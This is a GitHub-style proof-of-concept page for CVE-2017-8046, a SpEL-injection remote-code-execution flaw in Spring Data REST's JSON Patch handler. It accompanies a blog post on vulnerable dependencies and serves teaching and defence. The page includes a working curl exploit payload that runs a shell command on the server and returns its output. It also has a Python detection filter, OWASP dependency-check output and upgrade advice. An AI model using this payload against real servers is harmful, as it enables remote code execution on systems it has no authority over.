CVE-2017-8046 PoC — Pivotal Spring Data REST, Spring Boot and Spring Data security vulnerability

Associated Vulnerability
Title: Pivotal Spring Data REST, Spring Boot and Spring Data security vulnerability (CVE-2017-8046)
Description: Malicious PATCH requests submitted to servers using Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1) and Spring Boot versions prior to 1.5.9, 2.0 M6 can use specially crafted JSON data to run arbitrary Java code.
Readme
<p align="center"><a href="https://www.verygoodsecurity.com/"><img src="https://avatars0.githubusercontent.com/u/17788525" width="128" alt="VGS Logo"></a></p>

_**DISCLAIMER:** This repository is supplementary to the VGS blog post,
[How to Avoid "Using Components with Known Vulnerabilities"](https://develop--vgsblog.netlify.com/posts/how-to-avoid-using-components-with-known-vulnerabilities/).
It contains an application with a known security vulnerability (namely,
[CVE-2017-8046](https://pivotal.io/security/cve-2017-8046)), as well as the
description of how to exploit it. Use the application at your own risk!_

## Setting Up

First, start the application by executing the following command from the root of the repository:

```bash
mvn clean spring-boot:run
```

Second, create a resource by sending a `POST` request like this:

```bash
curl -X POST http://localhost:8080/books \
  -H 'Content-Type: application/json' \
  -d '{"isbn":"978-3827268969","title":"Thinking in Java","author":"Bruce Eckel"}'
```

## Exploiting the Vulnerability

```bash
curl -X PATCH http://localhost:8080/books/1 -H 'Content-Type: application/json-patch+json' -d '[{"op":"replace","path":"T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ifconfig\").getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x","value":"Your application has been hacked"}]'
```

Provided the application is running on a Unix-like operating system that has
`ifconfig` on its PATH (e.g. macOS; many current Linux images ship only `ip`, so
substitute `id` or `uname -a` there), the response body contains the host's
network configuration. The `Content-Type: application/json-patch+json` header
routes the request to Spring Data REST's JSON Patch handler, and the vulnerable
versions evaluate the `path` member of each patch operation as a
[SpEL](https://docs.spring.io/spring/docs/current/spring-framework-reference/core.html#expressions)
expression instead of treating it as a plain JSON Pointer. The expression above
therefore runs `Runtime.exec("ifconfig")` on the server and copies the process
output into the HTTP response; any other SpEL expression can be used in its
place.
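A defensive counterpart to the request above, added here as an example and not code from the VGS repository: a small Python check that a reverse proxy, WAF rule or log-triage script can run over `application/json-patch+json` bodies. RFC 6902 requires `path` (and `from`, for `move`/`copy`) to be RFC 6901 JSON Pointers, which are empty or start with `/`, and Spring Data REST maps those pointers onto bean properties and array indices. Any other shape, including the `T(...)` type reference in the payload above, has no legitimate use and is flagged. The two request bodies are constructed for the example; the first reproduces the payload from the curl command.

```python
"""Flag JSON Patch operations whose "path"/"from" is not a plain JSON Pointer.

Added example, not code from the CVE-2017-8046 PoC repository. EXPLOIT_BODY and
BENIGN_BODY are constructed for the demonstration.
"""
import json
import re

# Spring Data REST turns "/title" into the bean property "title" and "/tags/0"
# into "tags[0]". Accept only tokens that look like a Java property name, an
# array index, or the RFC 6901 "-" (append-to-array) token.
_TOKEN_RE = re.compile(r"^(?:[A-Za-z_$][A-Za-z0-9_$]*|\d+|-)$")


def is_safe_pointer(path):
    """True if `path` is an RFC 6901 pointer made only of bean-property tokens."""
    if not isinstance(path, str):
        return False
    if path == "":
        return True          # "" addresses the whole document
    if not path.startswith("/"):
        return False         # SpEL such as T(java.lang.Runtime)... never does
    return all(_TOKEN_RE.match(token) for token in path.split("/")[1:])


def suspicious_ops(body):
    """Return the operations of a JSON Patch body that fail is_safe_pointer.

    Input that is not a JSON array is returned as a single entry carrying an
    "error" key, so callers treat malformed bodies as hostile rather than clean.
    """
    try:
        ops = json.loads(body)
    except ValueError:
        return [{"error": "not JSON", "body": body}]
    if not isinstance(ops, list):
        return [{"error": "not a JSON Patch array", "body": ops}]
    flagged = []
    for op in ops:
        if not isinstance(op, dict):
            flagged.append(op)
            continue
        # "from" is a pointer too (move/copy), so it gets the same check;
        # an operation with no pointer at all is malformed and also flagged.
        pointers = [op[key] for key in ("path", "from") if key in op]
        if not pointers or not all(is_safe_pointer(p) for p in pointers):
            flagged.append(op)
    return flagged


# Constructed sample: the PoC payload from the curl command above.
EXPLOIT_BODY = json.dumps([{
    "op": "replace",
    "path": "T(org.springframework.util.StreamUtils).copy("
            "T(java.lang.Runtime).getRuntime().exec(\"ifconfig\").getInputStream(),"
            "T(org.springframework.web.context.request.RequestContextHolder)"
            ".currentRequestAttributes().getResponse().getOutputStream()).x",
    "value": "Your application has been hacked",
}])

# Constructed sample: an ordinary update to the Book resource.
BENIGN_BODY = json.dumps([
    {"op": "replace", "path": "/title", "value": "Thinking in Java, 4th ed."},
    {"op": "add", "path": "/tags/-", "value": "java"},
])

if __name__ == "__main__":
    for name, body in (("exploit", EXPLOIT_BODY), ("benign", BENIGN_BODY)):
        bad = suspicious_ops(body)
        print(f"{name}: {len(bad)} suspicious operation(s)")
        for op in bad:
            print("   ", json.dumps(op)[:80])
```

The token whitelist is deliberately stricter than RFC 6901 (which allows any character in a reference token) because the only consumer here is a bean-property mapper; a `/` alone or a token such as `title.toUpperCase()` is rejected even though it is a syntactically valid pointer.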

## Checking Vulnerable Dependencies

```bash
mvn clean package verify
```

The build fails because OWASP dependency-check finds dependencies carrying
vulnerabilities with a CVSS score of 7.0 or higher, CVE-2017-8046 among them:

```
[ERROR] Failed to execute goal org.owasp:dependency-check-maven:3.3.2:check (default) on project CVE-2017-8046:
[ERROR]
[ERROR] One or more dependencies were identified with vulnerabilities that have a CVSS score greater than or equal to '7.0':
[ERROR]
[ERROR] spring-boot-1.5.5.RELEASE.jar: CVE-2017-8046
[ERROR] spring-core-4.3.10.RELEASE.jar: CVE-2018-1275, CVE-2018-1270
[ERROR] jackson-databind-2.8.9.jar: CVE-2017-15095, CVE-2017-17485, CVE-2018-7489
[ERROR] spring-boot-starter-data-rest-1.5.5.RELEASE.jar: CVE-2018-1273, CVE-2017-8046
[ERROR]
[ERROR] See the dependency-check report for more details.
```
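The gate that produces the failure above is the OWASP dependency-check Maven plugin running in the `verify` phase. The repository's `pom.xml` is not reproduced on this page, so the following is an added example of the plugin wiring that yields this behaviour, not the project's own file: the plugin version and the 7.0 threshold are taken from the error output, and the execution binding is an assumption (the `check` goal binds to `verify` by default).

```xml
<!-- Added example: assumed dependency-check-maven wiring, not the PoC's own pom.xml -->
<build>
  <plugins>
    <plugin>
      <groupId>org.owasp</groupId>
      <artifactId>dependency-check-maven</artifactId>
      <version>3.3.2</version>
      <configuration>
        <!-- Fail the build when any dependency has a CVE scored CVSS >= 7.0;
             lower this toward 0 to fail on every known CVE. -->
        <failBuildOnCVSS>7</failBuildOnCVSS>
      </configuration>
      <executions>
        <execution>
          <goals>
            <!-- "check" runs in the verify phase unless bound elsewhere -->
            <goal>check</goal>
          </goals>
        </execution>
      </executions>
    </plugin>
  </plugins>
</build>
```

The fix the blog post argues for is the upgrade itself, for example moving `spring-boot-starter-parent` to 1.5.9.RELEASE or later so that the transitive `spring-data-rest` and `spring-core` versions clear the listed CVEs; the plugin only makes the presence of such components fail loudly in CI.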

## What is VGS?

_**Want to just jump right in?** Check out our [getting started
guide](https://www.verygoodsecurity.com/docs/getting-started)._

Very Good Security (VGS) allows you to enhance your security standing while
maintaining the utility of your data internally and with third-parties. As an
added benefit, we accelerate your compliance certification process and help you
quickly obtain security-related compliances that stand between you and your
market opportunities.

To learn more, visit us at https://www.verygoodsecurity.com/

## License

This project is licensed under the MIT license. See the [LICENSE](LICENSE) file
for details.
File Snapshot

```
[4.0K] /data/pocs/b3f77c5cdc1d7c7bbb6f6dea9a422017c3ca1e9d
├── [1.1K] LICENSE
├── [2.3K] pom.xml
├── [3.1K] README.md
└── [4.0K] src
    └── [4.0K] main
        ├── [4.0K] java
        │   └── [4.0K] com
        │       └── [4.0K] verygoodsecurity
        │           ├── [ 643] Application.java
        │           └── [4.0K] domain
        │               ├── [1.3K] AuditableEntity.java
        │               ├── [ 879] Book.java
        │               └── [4.0K] repository
        │                   └── [ 673] BookRepository.java
        └── [4.0K] resources
            └── [ 128] application.yml

8 directories, 8 files
```